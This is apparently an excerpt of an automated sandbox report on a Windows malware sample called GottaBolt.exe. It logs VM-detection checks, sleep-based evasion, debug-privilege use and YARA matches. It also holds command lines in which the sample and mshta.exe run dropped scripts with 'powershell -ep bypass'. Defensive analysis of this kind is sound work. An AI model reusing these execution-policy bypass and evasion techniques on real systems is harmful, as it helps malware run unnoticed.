          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Source: C:\Users\user\Desktop\GottaBolt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
          Source: C:\Users\user\Desktop\GottaBolt.exeMemory allocated: 252F8770000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeMemory allocated: 252FA2D0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3410Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6370Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5494Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1598Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1266Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1347Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1975
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 686
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1930
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 826
          Source: C:\Users\user\Desktop\GottaBolt.exe TID: 7096Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exe TID: 5080Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exe TID: 1120Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep count: 3410 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6656Thread sleep count: 6370 > 30Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6540Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6488Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5704Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6680Thread sleep count: 1975 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6984Thread sleep count: 686 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2828Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4308Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep count: 1930 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7072Thread sleep count: 826 > 30
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6464Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2200Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\GottaBolt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V magoeokhhftjckr Bus+
          Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $Hyper-V Hypervisor Logical Processor
          Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: X2Hyper-V VM Vid Partition
          Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes
          Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9F5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V magoeokhhftjckr Bus Pipesd
          Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: THyper-V Hypervisor Root Virtual Processor
          Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Virtual Machine Bus Pipes
          Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: JHyper-V Hypervisor Logical Processor
          Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: *Hyper-V Dynamic Memory Integration Service
          Source: GottaBolt.exe, 00000000.00000002.2643985765.00000252FC036000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root PartitionTr
          Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
          Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: !Hyper-V Hypervisor Root Partition
          Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9D1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VHyper-V Dynamic Memory Integration Service%
          Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: )Hyper-V Hypervisor Root Virtual Processor
          Source: GottaBolt.exe, 00000000.00000002.2629516834.000002528015D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V VM Vid Partition
          Source: GottaBolt.exe, 00000000.00000002.2639466093.00000252F8814000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: &Hyper-V HypervisorF
          Source: powershell.exe, 00000004.00000002.2346622209.0000024E86928000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: GottaBolt.exe, 00000000.00000002.2644833848.00000252FC110000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll(I
          Source: powershell.exe, 00000008.00000002.4198513768.000001E8F5456000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: GottaBolt.exe, 00000000.00000002.2641944855.00000252FA9BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Servicett
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: Yara matchFile source: amsi64_4428.amsi.csv, type: OTHER
          Source: Yara matchFile source: Process Memory Space: GottaBolt.exe PID: 5760, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4428, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv3.ps1, type: DROPPED
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"
          Source: C:\Users\user\Desktop\GottaBolt.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv1.ps1"Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "Jump to behavior
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
          Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\fbSDjyOv2.ps1 "
          Source: powershell.exe, 00000008.00000002.3942045111.000001E8DE5AD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DED42000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3942045111.000001E8DE84A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerP
          Source: powershell.exe, 00000008.00000002.3942045111.000001E8DE22F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager2
          Source: powershell.exe, 00000008.00000002.3934967783.000000411FACA000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: Program Manager Chrome
          Source: C:\Users\user\Desktop\GottaBolt.exeQueries volume information: C:\Users\user\Desktop\GottaBolt.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\GottaBolt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
